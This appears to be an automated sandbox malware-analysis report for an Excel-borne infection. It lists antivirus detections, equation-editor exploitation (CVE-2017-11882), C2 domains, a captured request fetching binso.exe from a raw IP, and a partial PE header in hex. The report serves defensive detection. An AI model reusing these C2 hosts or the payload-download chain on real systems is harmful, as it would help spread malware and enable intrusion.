              Source: 10.3.Odhbljup.exe.1cfdb70.110.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cfd60c.102.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.3148e0.78.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce4d5c.88.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.330008.214.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.330008.212.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d6943c.204.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.331324.242.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d6d5a0.7.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cf96b4.182.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d6d620.283.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce0e80.52.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce9258.187.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d79f90.13.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.310b08.36.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d64f28.97.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d6d4f4.267.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cecb88.223.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d6c3b0.211.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d6911c.56.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.315e2c.140.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.314b84.84.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce8e6c.162.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce43b0.70.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1d01b18.60.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cfe368.16.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce5eec.146.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d70ed4.92.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.329938.189.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cf92e0.43.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce50cc.4.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d65eec.144.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d6d598.277.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.315494.128.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.310b08.34.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce8e6c.161.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d650cc.4.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d81ef4.276.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce5eec.144.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1d0199c.254.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.315eec.146.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1d0058c.216.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.31c008.207.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1d01dfc.272.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.31fffc.32.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d81dac.269.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.329a74.201.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.323ffc.86.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce5e30.138.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d652c8.113.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d6d444.264.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1d01c54.262.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.31cb84.227.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d7126c.98.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce0eec.1.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d6cb84.229.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d74008.79.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cf8fb8.159.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d69308.6.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d7058c.75.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.318fdc.175.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cef438.65.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.318fdc.173.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d650cc.2.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cff438.208.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d6d734.287.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d7d60c.99.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d7909c.162.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce9308.6.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cf058c.75.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.329a1c.193.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.328008.154.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.331520.48.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce0c38.38.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1d00ad4.225.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.31f438.67.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.331774.248.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce50f4.104.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ced444.263.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d648e4.74.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d79938.189.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d71414.55.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.323000.141.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d81520.45.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ced5a0.9.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.3292e0.43.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.318b08.35.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d6d098.245.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d7d0a8.94.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce8e6c.39.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d79a74.198.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.321894.8.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d74008.147.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.32b840.149.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.332094.284.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.320008.71.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d6d098.243.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.331dfc.274.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.328fb8.157.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.32e610.131.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.31932c.192.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d65e30.138.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.31d448.261.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.31d444.265.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d64b84.85.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d650f4.105.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.321604.108.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.31d098.245.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.31d5a0.6.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce459c.33.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d70ed4.89.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d6d5a0.8.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d6cb88.225.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce0e80.54.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.318d98.155.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d80ed4.232.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.329c94.204.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d7e368.17.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d6c8e4.217.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d793d4.176.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ced378.256.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d8199c.254.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1d00008.214.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce932c.192.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.325be4.13.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.31d620.285.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cfe2fc.123.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce8e6c.42.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cec8e0.219.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.315388.120.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d68e6c.39.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d60b08.35.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.320ad4.83.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d7b840.150.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce4f28.96.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d6d4f0.273.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.332094.286.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cf1894.11.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d7db70.110.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.329f90.15.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ced098.244.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d6c008.208.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cf5be4.12.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.32909c.163.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cecd5c.231.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cf909c.163.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d73014.137.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce5e30.136.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1d01520.46.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.33154c.244.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.31c8e4.217.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ced620.285.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d6914c.179.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.318e6c.40.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d6fb84.28.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce9f80.28.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.3185dc.153.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce48e4.72.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.319308.7.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cfe610.131.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d82764.16.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cf19ac.114.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce932c.191.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce459c.30.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cf1894.8.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d64b84.84.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1d0199c.253.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cecb84.227.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1d0058c.218.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d81c54.262.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce8b08.37.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cf0008.71.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.318e6c.169.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.318e6c.167.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.32058c.75.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d6911c.54.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.31d1ac.247.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d7f438.210.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce4370.24.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce4d5c.89.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.32e2fc.126.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d71604.106.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce8e6c.167.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cfb840.150.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d6d444.263.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ced620.283.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.33199c.253.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cf3ffc.87.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cfd0a8.93.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce52c8.112.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce4370.25.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cf0ed4.91.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cf1414.56.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d790f4.170.unpackAvira: Label: TR/Patched.Ren.Gen

              Exploits:

              barindex
              Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
              Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
              Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000004.00000003.515473783.0000000004C20000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.567269073.0000000004DB0000.00000040.00000001.sdmp, vbc.exe, 00000004.00000003.514018824.0000000004AC0000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.567928489.0000000004F30000.00000040.00000001.sdmp, NAPSTAT.EXE
              Source: Binary string: napstat.pdb source: vbc.exe, 00000004.00000002.563648923.0000000003CF0000.00000040.00020000.sdmp, vbc.exe, 00000004.00000003.557853611.0000000004911000.00000004.00000001.sdmp
              Source: C:\Users\Public\vbc.exeCode function: 4_2_004057AC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
              Source: C:\Users\user\Odhbljup.exeCode function: 7_2_004057AC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
              Source: C:\Users\user\Odhbljup.exeCode function: 10_2_004057AC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 13.250.31.113:80
              Source: global trafficDNS query: name: onedrive.live.com
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 4x nop then pop ebx
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 13.250.31.113:80

              Networking:

              barindex
              System process connects to network (likely due to code injection or exploit)Show sources
              Source: C:\Windows\explorer.exeNetwork Connect: 87.98.234.164 80
              Source: C:\Windows\explorer.exeDomain query: www.urzeczenie.com
              C2 URLs / IPs found in malware configurationShow sources
              Source: Malware configuration extractorURLs: www.heidecide.xyz/hno0/
              Source: global trafficHTTP traffic detected: GET /hno0/?mhcd=MR-LdRqXxT7p86&g6A06=gtNg4Bp0cFA4pVLeRD7vodntk6HewgsZ+AnpdRhteKnDm7bsVUj6fD8/RHuCSiZlcACYig== HTTP/1.1Host: www.urzeczenie.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 02 Dec 2021 18:33:47 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.25Last-Modified: Thu, 02 Dec 2021 09:01:28 GMTETag: "aa600-5d2260935ec6b"Accept-Ranges: bytesContent-Length: 697856Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 9e 05 00 00 04 05 00 00 00 00 00 10 ac 05 00 00 10 00 00 00 b0 05 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 10 0b 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 0a 21 00 00 00 a0 06 00 00 66 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 06 00 6c 63 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 06 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 5c 9c 05 00 00 10 00 00 00 9e 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 80 14 00 00 00 b0 05 00 00 16 00 00 00 a2 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 a5 0d 00 00 00 d0 05 00 00 00 00 00 00 b8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 0a 21 00 00 00 e0 05 00 00 22 00 00 00 b8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 10 06 00 00 00 00 00 00 da 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 20 06 00 00 02 00 00 00 da 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 6c 63 00 00 00 30 06 00 00 64 00 00 00 dc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 66 04 00 00 a0 06 00 00 66 04 00 00 40 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 10 0b 00 00 00 00 00 00 a6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
              Source: global trafficHTTP traffic detected: GET /7009/binso.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 13.250.31.113Connection: Keep-Alive
              Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
              Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
              Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
              Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
              Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
              Source: EXCEL.EXE, 00000000.00000002.682149975.00000000050B0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
              Source: EXCEL.EXE, 00000000.00000002.682149975.00000000050B0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
              Source: EXCEL.EXE, 00000000.00000002.682326034.0000000005297000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
              Source: EXCEL.EXE, 00000000.00000002.682326034.0000000005297000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
              Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
              Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
              Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
              Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
              Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net03
              Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net0D
              Source: vbc.exe, 00000004.00000002.564186238.00000000041D0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
